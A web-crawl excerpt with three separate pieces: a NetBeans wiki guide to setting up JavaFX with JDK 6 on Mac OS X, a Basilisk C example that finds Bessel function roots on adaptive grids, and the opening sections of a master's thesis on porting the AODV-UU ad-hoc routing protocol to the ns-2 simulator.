Run it in the terminal: Mac:$ javafxc Hello.fx Mac:$ ls Hello$Intf.class Hello.class Hello.fx Mac:$ javafx Hello If you see the HelloWorld application, you have successfully configured JavaFX for the Terminal. Below you will see how to set up the NetBeans IDE to develop JavaFX applications. If you want to run the NetBeans IDE 6.1 on JDK 6, start it with the following command (all on one line!) from the X11 terminal: Mac:$ /Applications/NetBeans/NetBeans\ 6.1.app/Contents/MacOS/netbeans --jdkhome /sw/soylatte16-i386-1.0.2/ --laf javax.swing.plaf.metal.MetalLookAndFeel & This forces NetBeans to run on JDK 6 and to use the Metal look and feel (because SoyLatte/X11 does not support the Apple Aqua look and feel). See also warnings regarding X11 below. Normally in Mac programs, the Exit, About and Options menu items are in the Application menu. With SoyLatte, all Java applications run within X11, and the application menu is owned by the X11.app. So these three important menu items are inaccessble. Thanks to Wangwj for this brilliant hack how to get the menus back: The NetBeans IDE is now ready for JDK 6 development on the Mac You can skip this step if you don't develop JavaFX. The NetBeans IDE is now ready for JavaFX development on the Mac. To make the settings permanent for the terminal, add the following lines to your ~/.bash_profile file. (The alias line must be on one line.) export JAVA_HOME=/sw/soylatte16-i386-1.0.2 export PATH=/sw/soylatte16-i386-1.0.2/bin:$PATH alias netbeans-jdk6="/Applications/NetBeans/NetBeans\ 6.1.app/Contents/MacOS/netbeans --jdkhome /sw/soylatte16-i386-1.0.2/ --laf javax.swing.plaf.metal.MetalLookAndFeel" Make the most of using an IDE: To check whether a JavaFX project is configured correctly, open the project properties and check these two things (in this order): Our custom NetBeans JDK 6 edition looks different from other Mac applications: It runs with a little help from the X11 window system. This workaround has a couple of important side-effects. --laf javax.swing.plaf.metal.MetalLookAndFeel
http://wiki.netbeans.org/JavaFXAndJDK6On32BitMacOS
CC-MAIN-2017-39
refinedweb
866
60.41
sandbox/Antoonvh/root-finding.c Root Finding Using Adaptive Grids We can find the zeros of a smooth function using adaptive grids. This can be achieved by iteratively refining arround the neighborhood where the function changes sign. Note that this algorithm is not fool proof, e.g. it can not find for . But the concept can be easily extended to work for such roots as well. Furtheremore, it migth produce floating point errors if there is a root that is a rational number. In this example we try to find the non trivial zeros of the first Bessel function of the first kind for is between zero and 20. I.e. We assume that the math library has an accurate enough definitnion of this function. #include "grid/bitree.h" #define function(x) (j1(x)) scalar f[],rf[]; int maxlevel = 19; int main(){ FILE * fp1 = fopen("j1.dat","w"); FILE * fp2 = fopen("roots.dat","w"); L0=20; X0=0.0001; N=(128); init_grid(N); foreach(){ f[]=function(x); rf[]=1/f[]; } int tot = 1; while (tot>0) { astats g = adapt_wavelet({rf},(double[]){1.},maxlevel,8); foreach(){ f[]=function(x); rf[]=1/f[]; } tot = g.nf+g.nc; } int n = 0,nn=0; foreach(){ n++; fprintf(fp1,"%g\t%g\n",x,f[]); if (level == maxlevel&&(f[]*f[1]<0)){ fprintf(ferr,"x=%.*g\n",10,(x*f[1] + (x+(L0/(pow(2,maxlevel))))*f[0])/(f[]+f[1])); fprintf(fp2,"%g\t%g\n",(x*f[1] + (x+(L0/(pow(2,maxlevel))))*f[0])/(f[]+f[1]) , 0.); } } foreach_cell() nn++; fprintf(ferr,"with error margin = %.*f\nUsed grid cells: %d or %d if you count non-leaf cells as well.\n",10,L0/pow(2,maxlevel),n,nn); } Results This Produces the following output in the terminal: x=3.831734287 x=7.015553147 x=10.17344108 x=13.32339081 x=16.47077911 x=19.6158736 with error margin = 0.0000381470 Used grid cells: 2628 or 5565 if you count non-leaf cells as well. This seems to correspond with online references down to the mentioned accuracy. We also plot the results:
http://basilisk.fr/sandbox/Antoonvh/root-finding.c
CC-MAIN-2018-43
refinedweb
350
68.97
Cedric Le Goater <clg@fr.ibm.com> writes:> I've used the ipc namespace patchset in rc6-mm2. Thanks for putting this> together, it works pretty well ! A few questions when we clone :>> * We should do something close to what exit_sem() already does to clear the> sem_undo list from the task doing the clone() or unshare().Possibly which case are you trying to prevent?> * I don't like the idea of being able to unshare the ipc namespace and keep> some shared memory from the previous ipc namespace mapped in the process mm.> Should we forbid the unshare ?No. As long as the code handles that case properly we should be fine.As a general principle we should be able to keep things from other namespacesopen if we get them. The chroot or equivalent binary is the one that needsto ensure these kinds of issues don't exist if we care.Speaking of we should put together a small test application probably similarto chroot so people can access these features at least for testing.> Small fix follows,>> thanks,>> C.Ack. For the unshare fix below. Could you resend this one separately withpatch in the subject so Andrew sees it and picks up?> From: Cedric Le Goater <clg@fr.ibm.com>> Subject: ipc namespace : unshare fix>> Signed-off-by: Cedric Le Goater <clg@fr.ibm.com>>> ---> kernel/fork.c | 3 ++-> 1 file changed, 2 insertions(+), 1 deletion(-)>> Index: 2.6.17-rc6-mm2/kernel/fork.c> ===================================================================> --- 2.6.17-rc6-mm2.orig/kernel/fork.c> +++ 2.6.17-rc6-mm2/kernel/fork.c> @@ -1599,7 +1599,8 @@ asmlinkage long sys_unshare(unsigned lon> /* Return -EINVAL for all unsupported flags */> err = -EINVAL;> if (unshare_flags & ~(CLONE_THREAD|CLONE_FS|CLONE_NEWNS|CLONE_SIGHAND|> - CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|CLONE_NEWUTS))> + CLONE_VM|CLONE_FILES|CLONE_SYSVSEM|> + CLONE_NEWUTS|CLONE_NEWIPC))> goto bad_unshare_out;> > if ((err = unshare_thread(unshare_flags)))-To unsubscribe from this list: send the line "unsubscribe linux-kernel" inthe body of a message to majordomo@vger.kernel.orgMore majordomo info at read the FAQ at
http://lkml.org/lkml/2006/6/12/227
CC-MAIN-2013-48
refinedweb
328
65.62
Responding to selection You can use a ListView to only display data, and this can be a good way to present the data neatly in your app. You can also use ListView to take action when a user selects an item in the list. To respond to the selection of an item, you need to know which item was selected. Cascades uses index paths to identify list items. Index paths When you construct a data model to use in a ListView, the model typically uses a hierarchical structure. Header items might be at the first level of the model, and normal items might be nested at the second level (or further levels down in the hierarchy). When a user selects an item in the list, you need to know exactly where the data for that item is located in the data model, so you can respond to the selection appropriately. An index path represents the location of an item relative to the root item of the ListView. It's important to note that the root item of the ListView might not be the root item of the data model. The data model might contain a hierarchy that is many levels deep, but a ListView shows only the first two levels of items below its root item. You can set the item that should be used as the root item of the ListView by using the rootIndexPath property. The index path of an item is an ordered list of integers, and each integer represents an ancestor of the item. For example, for an item that is a direct child of the root item, its index path contains a single integer. For an item that is a child of that item, its index path contains two integers. The value of each integer indicates the item's ordering relative to the other children of its parent, starting at 0. For example, a value of 3 indicates that the item is the fourth child of its parent, and a value of 0 indicates that the item is the first child of its parent. To illustrate the concept of index paths, consider the following hierarchical data model. Each item in the model includes a piece of data, which is specified by the title property. The index path of each item (relative to the <root> item) is listed in square brackets. If you use a ListView to represent this data and you don't specify a value for the rootIndexPathproperty, the ListView uses the <root> element as its root item. In this case, the list items in the first two levels of the data model are displayed in the list, but the items in the third level (the level that includes "Gala" and "Butternut") aren't displayed. You can change the item that the ListView uses as its root item to alter the data that's displayed in the list. In the example above, you could specify the "Fruit" item as the root item, and then all child items of that item would be displayed in the list. The "Gala", "McIntosh", and "Empire" items would be included, because they would be at the second level relative to the new root item. Responding to selection of a single item There are two ways that you can respond to the selection of a single item in a ListView. You can perform an action immediately when a user taps a list item, or you can use a context menu for each list item to let the user select what action should be performed. Responding to selection immediately When a user taps an item in a list, the ListView emits the triggered() signal and you can use the onTriggered signal handler to respond to this signal. The signal includes an indexPath parameter that specifies the index path of the tapped item. After you obtain the index path of the item that was tapped, you can use it to retrieve the item's data from the data model by calling DataModel::data(). You can then access the item's properties and respond to the tap. Here's how to create a list using an XML data model that's specified in an items.xml file. Each list item in the data model (not including header items) has a title property and status property. The values of the title properties are displayed as the list items, and when an item is tapped, the value of that item's status property is displayed in a TextField. import bb.cascades 1.0 Page { content: Container { // Create a ListView that uses an XML data model ListView { dataModel: XmlDataModel { source: "models/items.xml" } // Use a ListItemComponent to determine which property in the // data model is displayed for each list item listItemComponents: [ ListItemComponent { type: "listItem" StandardListItem { // Display the value of an item's title property // in the list title: ListItemData.title } } ] // When an item is selected, update the text in the TextField // to display the status of the new item onTriggered: { var selectedItem = dataModel.data(indexPath); textField.text = selectedItem.status; } } // Create a text field to display the status of the selected item TextField { id: textField text: "" } } // end of top-level Container } // end of Page Responding to selection using the context menu There are times when you might not want to perform an action immediately when a user taps a list item. Instead, you may want to provide a set of multiple actions for that list item that the user can choose from. For example, for a list of contacts, you might want to let the user do any of the following when they select a contact from the list: - Send an email - Start a chat - Start a video conference - Delete the contact To provide this choice, you can add a context menu to list items. The context menu appears when a user touches and holds an item, and it contains a set of actions that apply to that item. You can add context menus to any control in Cascades, not just list items. To learn more about adding context menus to other controls, see Adding a context menu. When a user touches and holds an item, a partial context menu is displayed. This partial menu shows only the icons that are associated with each action in the menu. The user can either select an action icon from the partial menu (at which time, that action expands to display the title of the action) or swipe the menu to the left to display the full context menu. You can add a context menu to a list item by using the contextActions list property. This property is associated with the content that you use for the ListItemComponent of the list item. For example, consider the following simple ListView: ListView { dataModel: XmlDataModel { source: "models/myDataModel.xml" } listItemComponents: [ ListItemComponent { type: "listItem" StandardListItem { title: ListItemData.title contextActions: [ // Add actions for the context menu here ] } } // end of ListItemComponent ListItemComponent { type: "specialListItem" Container { Label { ... } Label { ... } contextActions: [ // Add actions for the context menu here ] } } // end of ListItemComponent ] // end of listItemComponents list } // end of ListView This ListView uses two ListItemComponent objects to define how list items look. In the first ListItemComponent, a StandardListItem is used for items in the data model that have a type of "listItem". In the second ListItemComponent, a custom layout (with a Container at the root) is used for items that have a type of "specialListItem". It's inside the content of each ListItemComponent (that is, within the StandardListItem and the Container) that you include the contextActions list property. You add actions to the context menu by using an ActionSet and filling it with ActionItem objects. Each ActionItem corresponds to an action in the context menu. Here's how to create a context menu containing four actions that apply to list items. import bb.cascades 1.0 Page { content: Container { ListView { // Use data from an XML file as the data model dataModel: XmlDataModel { source: "models/contacts.xml" } listItemComponents: [ ListItemComponent { type: "listItem" // For each item in the data model that has a type of // "listItem", use a StandardListItem to display the item StandardListItem { title: ListItemData.firstname + " " + ListItemData.lastname contextActions: [ // Add a set of four actions to the context menu for // a list item ActionSet { title: "Contact" ActionItem { title: "Send an Email" imageSource: "asset:///images/email.png" } ActionItem { title: "Start a Chat" imageSource: "asset:///images/chat.png" } ActionItem { title: "Start a Video Conference" imageSource: "asset:///images/video.png" } ActionItem { title: "Delete" imageSource: "asset:///images/delete.png" } } // end of ActionSet ] } // end of StandardListItem } // end of ListItemComponent ] } // end of ListView } // end of top-level Container } // end of Page It's important to note that when a user touches and holds a list item to display the context menu for that item, the triggered() signal isn't emitted. You should make sure that you handle this behavior properly in your app. In general, when the user taps an item and the triggered() signal is emitted, your app should perform the most common action for that item. For example, tapping on an email in an email app should open the email, and tapping on a song in a music player app should play the song. Your app should include less common actions in the context menu. Responding to selection of multiple items In addition to performing actions on a single item in a list, you might want your app to provide actions that apply to multiple list items at once. For example, in a list of contacts, you might let users select multiple contacts and add them all to the To line of an email, set up a meeting with those contacts, or delete all of those contacts. Cascades lets you support multiple selection in your lists with just a few lines of code. You don't need to implement the multiple selection mechanism or provide a visual appearance for the selection. Cascades handles these aspects automatically, so you simply need to do the following in your app: - Provide an action that enables multiple selection mode - Specify the actions that you want to include on the multiple selection menu Enabling multiple selection mode To enable multiple selection mode, you use a special type of action called a MultiSelectActionItem . You can add this action in different places in your app (such as the action menu or context menu), just like any other action item. A MultiSelectActionItem has a default image and text, but you can choose to customize these properties. When you create a MultiSelectActionItem, you need to associate it with a MultiSelectHandler (which you'll learn about in the next section). This handler is associated with a ListView and contains the actions that should appear on the context menu when multiple list items are selected. When a user selects the MultiSelectActionItem, the handler is invoked and displays the multiple selection interface and the actions that you specify. Here's how to create a MultiSelectActionItem and add it to the action menu of a Page. The MultiSelectActionItem is associated with the MultiSelectHandler of a ListView called list. In the next section, you'll learn how to populate the list's MultiSelectHandler with actions. import bb.cascades 1.0 Page { actions: [ MultiSelectActionItem { multiSelectHandler: list.multiSelectHandler } ] ListView { id: list dataModel: XmlDataModel { source: "models/contacts.xml" } } } When a user enables multiple selection mode using a MultiSelectActionItem, the multiple selection interface is displayed. This interface includes a context menu on the right side of the screen, which contains actions that apply to the selected items. The interface also includes a status bar at the bottom of the screen, which contains a Cancel button (to disable multiple selection mode) and status text that you can customize. You can use the status property, which is part of MultiSelectHandler, to display this text. For example, you might want to show how many list items are currently selected. While multiple selection mode is enabled, the user can tap list items to select them. A default visual style is used for selected list items. The user can also tap selected items to deselect them. Actions that apply to the selected items are displayed in a partial context menu, which the user can swipe or drag to display the full context menu. Specifying actions for the multiple selection menu To add actions to the context menu when multiple selection mode is enabled, you can use the multiSelectHandler property of a ListView. This property defines a MultiSelectHandler, which determines how multiple selection works for the ListView. Inside the multiSelectHandler property, you can use the actions: list property to add ActionItem objects to the context menu. Here's how to add actions to the context menu in multiple selection mode. This code sample includes a MultiSelectActionItem to enable multiple selection mode, and also includes a few other interesting additions that demonstrate some of the features of the mode: - The onActiveChanged signal handler is used to handle the activeChanged() signal that's emitted by the list's MultiSelectHandler. This signal indicates when multiple selection mode is enabled or disabled, and the text of a Label is updated accordingly. - The onSelectionChanged signal handler is used to handle the selectionChanged() signal that's emitted by the ListView. This signal indicates that a list item has been selected or deselected, and the text in the status area is updated to reflect how many items are currently selected. - A MultiSelectActionItem is assigned to the multiSelectAction property of the ListView. When you set this property, a MultiSelectActionItem is added automatically to the context menu of each list item, meaning that you don't need to add them manually to each item. Note that each list item must include an ActionSet in order for the MultiSelectActionItem to be added to it. So, an empty ActionSet is added to the contextActions list of the StandardListItem. import bb.cascades 1.0 Page { actions: [ // Add an action to enable multiple selection mode. This action // appears in the action menu on the main Page of the app. MultiSelectActionItem { multiSelectHandler: list.multiSelectHandler } ] Container { ListView { id: list dataModel: XmlDataModel { source: "models/contacts.xml" } // Set the multiSelectAction property so that an action to enable // multiple selection mode appears in the context menu of each // list item multiSelectAction: MultiSelectActionItem { } multiSelectHandler { actions: [ // Add the actions that should appear on the context menu // when multiple selection mode is enabled ActionItem { title: "Send an Email" imageSource: "asset:///images/email.png" }, ActionItem { title: "Start a Chat" imageSource: "asset:///images/chat.png" }, ActionItem { title: "Delete" imageSource: "asset:///images/delete.png" } ] // Set the initial status text of multiple selection mode. When // the mode is first enabled, no items are selected. status: "None selected" // When multiple selection mode is enabled or disabled, update // the label accordingly onActiveChanged: { if (active == true) { statusLabel.text = "Multiple selection mode is enabled."; } else { statusLabel.text = "Multiple selection mode is disabled"; } } } // When a list item is selected or deselected, update the status text // to reflect the number of items that are currently selected onSelectionChanged: { if (selectionList().length > 1) { multiSelectHandler.status = selectionList().length + " items selected"; } else if (selectionList().length == 1) { multiSelectHandler.status = "1 item selected"; } else { multiSelectHandler.status = "None selected"; } } listItemComponents: [ ListItemComponent { type: "listItem" // Use a standard list item for the visual appearance of list // items that have a type of "listItem" StandardListItem { title: ListItemData.firstname + " " + ListItemData.lastname // For a MultiSelectActionItem to be added to each list // item, the items must have an ActionSet. Create an // empty ActionSet to hold the action. You can also add // any other actions that should appear in the context // menu of a list item. contextActions: [ ActionSet { } ] } } // end of ListItemComponent ] } // end of ListView Label { id: statusLabel text: "Multiple selection mode is disabled." textStyle { base: SystemDefaults.TextStyles.SubtitleText } } } // end of top-level Container } // end of Page Rearranging lists 10.3 Lists support rearrange mode, which allows a user to drag items in a list to rearrange them. Only lists that use a StackListLayout support rearrange mode. Lists that use a GridListLayout or a FlowListLayout ignore the request to enable rearrange mode. While a list is in rearrange mode, grabbers are added to items in the list. Grabbers are visual overlays placed on items to indicate that they can be lifted and dragged. Grabbers are placed on top of list items, aligned right horizontally and centered vertically. Placement of a grabber is the same regardless of layout orientation. When the user lifts an item using a grabber, the list starts a move session. During a move session, the lifted item is detached from the layout and the user can drag the item around freely. An empty space remains in the layout, indicating the previous location of the item. When the user drags a lifted item close to the edges of the list, the list starts to scroll. The scrolling speed increases as the item is dragged closer to the edge of the list. If an item is released, or if the rearrange session is exited, the item snaps back to the location of the empty space as long as the app doesn't deny the move. When a lifted item is dragged so that it overlaps another item, the list emits a move request using a rearrange handler. In response to this signal, your app can either perform the requested move by updating the data model or choose to deny the move. If the item is moved, the empty space in the list layout (which represents the previous position of the item) is moved to the new location. If the move request is denied, the layout remains unchanged. Items can always be lifted and dragged, but no actual relocation occurs unless the data model is updated. Because a move session is made up of many intermediate move operations, a set of signals is provided to support apps that need to handle the session as a single transaction (for example, to support an Undo feature). The signals are as follows: - onMoveStarted() - Emitted when an item is lifted. - onMoveEnded() - Emitted when a lifted item is released. - onMoveAborted() - Emitted when the lifted item is released for any reason that can be seen as unintentional(for example, if the app closes while the user is dragging an item). The onMoveEnded() and onMoveAborted() signals both result in the item snapping back to its previous position in the list. However, the onMoveAborted() signal gives your app the option to deny the move operation or prompt the user for input. During rearrange mode and move sessions, certain actions that your app performs can cause the list to exit the current state forcefully. The list might also block some actions entirely. The following table describes how a list responds to actions that your app performs. Cases not covered in the table are treated as normal (for example, setting the scroll indicator mode). The following code sample shows a simple list with 20 items. Rearrange mode is enabled, and the list supports an Undo operation of the most recent move action. Page { content: Container { id: container property int itemOrigin: -1 property int lastItemDestination: -1 function undoItemMove() { if ( lastItemDestination != -1 && itemOrigin != -1) { theDataModel.move( lastItemDestination, itemOrigin ); console.log( "Item moved back from " + lastItemDestination + " to " + itemOrigin ); itemOrigin = -1; lastItemDestination = -1; } else { console.log( "Nothing to undo!" ) } } Button { text: "Undo" onClicked: { container.undoItemMove(); } } ListView { id: theListView layout: StackListLayout { id: thelayout } attachedObjects: [ ArrayDataModel { id: theDataModel } ] function isMoveAllowed() { console.log("Checking if allowed to move..."); return true; } objectName: "listView" dataModel: theDataModel rearrangeHandler { // Do not activate the handler here. It // will be forcefully deactivated when the data model is assigned. // active: true onMoveStarted: { console.log("onMoveStarted: " + event.startIndexPath); container.itemOrigin = event.startIndexPath[0]; } onMoveEnded: { console.log("onMoveEnded: " + event.endIndexPath); } onMoveUpdated: { console.log("onMoveUpdated: " + event.fromIndexPath[0] + " -> " + event.toIndexPath[0]); theDataModel.move( event.fromIndexPath[0], event.toIndexPath[0] ); if(!isMoveAllowed()) { event.denyMove(); } else { container.lastItemDestination = event.toIndexPath[0]; } } onMoveAborted: { console.log("oMoveAborted: " + event.endIndexPath); undoItemMove(); } onActiveChanged: { console.log("active changed: " + active); } } onCreationCompleted: { for ( var a = 0; a < 20; a++ ) { theDataModel.append("Item" + a); } rearrangeHandler.setActive(true); } } } } Last modified: 2014-05-14 Got questions about leaving a comment? Get answers from our Disqus FAQ.comments powered by Disqus
http://developer.blackberry.com/native/documentation/cascades/ui/lists/list_view_selection.html
CC-MAIN-2014-41
refinedweb
3,334
53.1
Represents a 3-d line with position defined in the orthogonal plane passing through the origin. More... #include <vgl_infinite_line_3d.h> Represents a 3-d line with position defined in the orthogonal plane passing through the origin. The line direction is t_. The 2-d plane coordinate system (u, v) is aligned with the 3-d coordinate system (X, Y, X), where v = t x X and u = v x t. Definition at line 29 of file vgl_infinite_line_3d.h. Default constructor - does not initialise!. Definition at line 35 of file vgl_infinite_line_3d.h. Copy constructor. Definition at line 38 of file vgl_infinite_line_3d.h. Construct from x0 and direction. Definition at line 42 of file vgl_infinite_line_3d.h. Construct from two points. Definition at line 10 of file vgl_infinite_line_3d.txx. Construct from a point and direction. Definition at line 46 of file vgl_infinite_line_3d.txx. Construct from a line segment. Definition at line 55 of file vgl_infinite_line_3d.h. Construct from a line 2 points. Definition at line 62 of file vgl_infinite_line_3d.h. Destructor. Definition at line 69 of file vgl_infinite_line_3d.h. The unit vectors perpendicular to the line direction. Definition at line 21 of file vgl_infinite_line_3d.txx. Check if point p is on the line. Definition at line 95 of file vgl_infinite_line_3d.txx. Definition at line 73 of file vgl_infinite_line_3d.h. Definition at line 80 of file vgl_infinite_line_3d.h. The comparison operator. Definition at line 77 of file vgl_infinite_line_3d.h. Return the point on the line closest to the origin. Definition at line 85 of file vgl_infinite_line_3d.txx. Return a point on the line defined by a scalar parameter t. t=0.0 corresponds to the closest point on the line to the origin Definition at line 92 of file vgl_infinite_line_3d.h. Assignment. Definition at line 84 of file vgl_infinite_line_3d.h. Accessors. Definition at line 72 of file vgl_infinite_line_3d.h. Write to stream. Read from stream. Return the intersection line of a set of planes, use list to distinguish from point return. Return the intersection line of a set of weighted planes, use list to distinguish from point return. Return the intersection point of infinite lines, if concurrent. Return the intersection point of two lines, if concurrent. Definition at line 482 of file vgl_intersection.txx. Return true if line intersects box. If so, compute intersection points. Definition at line 48 of file vgl_intersection.txx. line direction vector (tangent) Definition at line 32 of file vgl_infinite_line_3d.h. line position vector Definition at line 31 of file vgl_infinite_line_3d.h.
http://public.kitware.com/vxl/doc/release/core/vgl/html/classvgl__infinite__line__3d.html
crawl-003
refinedweb
412
62.85
Porting AODV-UU Implementation to ns-2 and Enabling Trace-based Simulation - Winifred Kennedy - 1 years ago - Views: Transcription 1 Uppsala Master s Thesis in Computer Science Examensarbete DV3, 1DT150 December 18, 2002 Porting AODV-UU Implementation to ns-2 and Enabling Trace-based Simulation Björn Wiberg Information Technology Department of Computer Systems Uppsala University Box 337 SE Uppsala Sweden Abstract In mobile ad-hoc networks, autonomous nodes with wireless communication equipment form a network without any pre-existing infrastructure. The functionality of these networks heavily depends on so called ad-hoc routing protocols for determining valid routes between nodes. The main goal of this master s thesis has been to port AODV-UU, a Linux implementation of the AODV (Ad hoc On-Demand Distance Vector) routing protocol, to run in the ns-2 network simulator. Automated source code extraction lets the ported version use the same source code as the conventional Linux version, to the extent this is possible. The second goal was to use logfiles from the APE testbed, a Linux-based ad-hoc protocol evaluation testbed, for enabling trace-based simulations with AODV-UU. Results of trace-based simulations show that it is possible to obtain packet delivery ratios closely corresponding to those of real-world experiments. Supervisor: Henrik Lundgren Examiner: Christian Tschudin Passed: 2 Acknowledgements I would like to thank my supervisor, Henrik Lundgren, for setting up and organizing this master s thesis project. Without his help, this project would probably not have been carried out at all. I am very grateful for all the support that I have received. Also, I would like to thank Erik Nordström, the author of AODV-UU, for his highly appreciated help during this project. Not only did he assist me and make me part of the development team during the initial stages of porting AODV-UU to the network simulator; he has also contributed with many good ideas that made the porting process easier, and helped me with implementation questions that popped up from time to time. Stefan Lindström, a very good friend of mine also working on his master s thesis project has helped me with C and C++ issues during the many hours of implementation and testing. Thanks, Stefan. Finally, I would like to thank my examiner, Christian Tschudin, who kindly agreed to take on the examination role right from the beginning of this project, and all the other members of the CoRe (Communications Research) group at the Department of Computer Systems (DoCS) at Uppsala University, Sweden, for their pleasant company during the entire project. ii 3 Contents 1 Introduction Background Proposed goals Accomplishments Document overview Ad-hoc Networks Introduction Properties of ad-hoc networks Comparisons with wired networks Infrastructure Addressing Routing Ad-hoc networking issues Wireless medium access Addressing Network security Applications of ad-hoc networks Conclusions Ad-hoc Routing Protocols Introduction The need for ad-hoc routing protocols Classification of ad-hoc routing protocols Properties of ad-hoc routing protocols The IETF MANET working group Examples of ad-hoc routing protocols DSDV OLSR AODV DSR TORA Conclusions AODV-UU Introduction Installation and usage Configuration Interaction with IP The Netfilter framework Performance iii 4 4.5 Software modules Non-kernel-related modules Kernel-related modules Packet handling Packet arrival Initial packet processing Data packet processing AODV control message processing AODV control message sending Current status The ns-2 Network Simulator Introduction Performing simulations Main building blocks Simulation scenario contents Simulation execution and analysis The OTcl/C++ environment Class hierarchy Event scheduling Packet delivery Nodes Node basics Node configuration and creation Node addressing Routing Links Queues Packets Packet types and headers The common header Packet allocation and de-allocation Agents Agent state information Agent packet methods Agent attachment Connecting agents Application attachment Creating a new agent Timers Traffic generators Error models Usage in wired networks Usage in wireless networks Mobile networking Mobile nodes Packet transmission Packet reception Simulation scenario setup Mobile node configuration and creation Mobile node movements iv 5 Routing in mobile networking Miscellaneous features Radio propagation models Free space model Two-ray ground reflection model Shadowing model Communication range adjustment Network interface characteristics Receive threshold calculation Trace files Trace configuration Trace formats Problems encountered with ns Summary Porting AODV-UU to ns Introduction Conversion overview Initial decisions Similar projects Areas of concern Environmental differences Network interfaces Packet handling Kernel interaction Variables Timers Logging Non-applicable features Different approaches of conversion Monolithic class approach Object-oriented approach Daemon approach The porting process Choice of conversion approach Conceptual overview The AODVUU class Methods Source code extraction Packet types and headers Packet buffering and handling Addressing Timers Logging Tracing Excluded features and modules Configuration and usage Extending the AODV-UU routing agent General C vs C++ issues Platform portability issues Miscellaneous source code changes v 6 Locating source code changes The AODV-UU Makefile Integrating AODV-UU with ns Bugs found by simulation Future work Summary Testing the Functionality of AODV-UU in ns Introduction General setup simple-wireless-aodv-uu.tcl Scenario overview Scenario setup Scenario description and results Conclusions wireless1-aodv-uu.tcl Scenario overview Scenario setup Results and conclusions The Roaming Node scenario Scenario overview Scenario setup Scenario description and simulation results Comparisons with real-world results Other differences between simulations and real-world experiments Comparisons with existing AODV implementation Conclusions Enabling Trace-based Simulation Introduction The APE testbed APE logging Modeling connectivity in ns Communication range adjustment Error model usage Existing error models Conclusions Proposed solution Related research The SourceDrop error model Functionality Technical details APE logfile processing Initial testing Roaming Node revisited Simulation scenario setup Results Discussion Conclusions vi 7 9 Summary and Future Work Summary of ns-2 port of AODV-UU Summary of trace-based simulation Comparisons of results General project compliance Future work A Glossary 95 vii 8 List of Figures 2.1 An example ad-hoc network The hidden terminal problem The exposed node problem Netfilter hooks for IP Packet handling of AODV-UU Partial ns-2 class hierarchy Discrete event scheduling in ns Packet delivery in ns Composite construction of a wired unicast node Composite construction of a uni-directional link Packet contents Mobile node schematics Layout of the wireless1-aodv-uu.tcl scenario Layout of the Roaming Node scenario Routing agent comparison (link layer feedback) Routing agent comparison (HELLO messages) viii 9 List of Tables 5.1 Selected options for node configuration Available routing modules Agent state information Typical path loss exponent ( ) values Typical shadowing deviation ( ) values Trace log contents (old trace format) Trace log contents (new trace format) Example application-level trace log contents (new trace format) AODV-UU routing agent default configuration Roaming Node Ping statistics (simulation) Roaming Node Ping success ratio (real-world) Roaming Node Ping statistics comparison (run 1) Roaming Node Ping statistics comparison (run 2) ix 10 Chapter 1 Introduction 1.1 Background During recent years, the market of mobile communication has literally exploded. Cellular phones and other mobile devices with built-in wireless communication have gained enormous popularity, and because of this, the term connectivity has come to mean much more than it did just a couple of years ago. Computer networks, traditionally viewed as infrastructure of a fixed form, have evolved into combinations of wired and wireless networks to suit today s needs of mobile communication. As the mobility of users continues to increase, a special type of networks will be gaining more and more attention mobile ad-hoc networks. In a mobile ad-hoc network, nodes do not rely on any existing network infrastructure. Instead, the nodes themselves form the network and communicate through means of wireless communication. Nodes will have to forward network traffic on behalf of other nodes to allow communication to take place between nodes that are out of each others immediate radio range. Hence, routing of network traffic becomes a central issue in these networks. For this purpose, numerous ad-hoc routing protocol specifications have been proposed, mainly by the IETF working group MANET [1]. Many of these proposals have been evaluated through simulations in network simulators [2, 3], but only a few of them have been evaluated through real-world tests [4, 5]. Both these approaches have their respective advantages and disadvantages. In simulations, experiments can easily be repeated and different parameters varied, which allows the impact of them to be studied. However, the drawback is that simplifications often are made in the models of the simulator, e.g. the models of wireless signal propagation. In real-world experiments, a routing protocol implementation can be evaluated without any specific assumptions or simplifications, but the testing environment can make it difficult to correlate observed results with details of the implementation. Therefore both approaches are useful, and complement each other. 1.2 Proposed goals The proposed goals of this master s thesis are the following: To port AODV-UU [6], one of the existing implementations of the mobile ad-hoc routing protocol AODV [7], to run in the ns-2 network simulator [8]. To enable trace-based AODV-UU simulations using logs from experiments conducted in the APE testbed [4], a Linux-based testbed for evaluation of ad-hoc protocols. To compare results of trace-based simulations with real-world results, and, if possible, improve existing models in the ns-2 network simulator. 1 11 1.3 Accomplishments All the proposed goals were successfully achieved during this master s thesis project. AODV-UU was ported to the ns-2 network simulator, using the same code base for simulations as for real-world experiments. Tracebased simulations with AODV-UU were performed using a custom-made error model to model connectivity between wireless nodes, and the results indicate that trace-based simulations allow packet delivery ratios to be obtained that are very close to those of real-world experiments. On a personal level, this master s thesis project has provided a considerable amount of insight on how to plan, perform and account for a scientific project. The initial question marks regarding the porting of AODV-UU were soon replaced by curiosity and a certain degree of self-confidence as I got acquainted to AODV-UU and the ns-2 network simulator. I was very happy to see the ported version of AODV-UU making it to the version 0.5 release in mid-june 2002 this was one of the major milestones during the project. 1.4 Document overview The rest of this document is outlined as follows. Chapter 2 gives an introduction to mobile ad-hoc networks in general and describes how they differ from conventional networks. Problems specific to wireless communication in mobile ad-hoc networks are pointed out, and some example applications of ad-hoc networks are mentioned. Chapter 3 describes the need for and properties of ad-hoc routing protocols. Some common ad-hoc routing protocols are reviewed, along with their suitability given different network and mobility conditions. Chapter 4 gives a technical overview of the AODV-UU implementation of the AODV routing protocol. The functionality of its software modules is described, and the packet handling is studied in detail. Chapter 5 gives an introduction to the ns-2 network simulator. Some of its network components are reviewed, and brief examples are provided to illustrate their usage. Emphasis is put on agents, mobile nodes and wireless communication, as this is of particular importance for the remaining chapters. Chapter 6 describes the process of porting the AODV-UU implementation to run in ns-2. The required changes to the implementation and the steps of integrating it with the network simulator are described in detail. Instructions on configuration and usage are provided as a reference. In Chapter 7, the functionality of the ported version of AODV-UU is tested through a number of simulation scenario test-runs. Simulation results are compared to expected results and real-world results, and some differences between simulations and real-world experiments are pointed out. Chapter 8 describes the usage of logs from real-world experiments for enabling trace-based simulations with AODV-UU. An introduction to the APE testbed is given, followed by a brief investigation of its logging features. Different methods of incorporating support for trace-based simulations in the network simulator are reviewed, and the resulting model for modifying network connectivity in the simulator is described. Several test-runs are conducted using trace-based simulation support, and the results are evaluated. Finally, Chapter 9 summarizes the outcome of the entire project, compares the results to the proposed goals, verifies general project compliance and provides some notes on future work. 2 12 Chapter 2 Ad-hoc Networks 2.1 Introduction A wireless mobile ad-hoc network (MANET) is a network consisting of two or more mobile 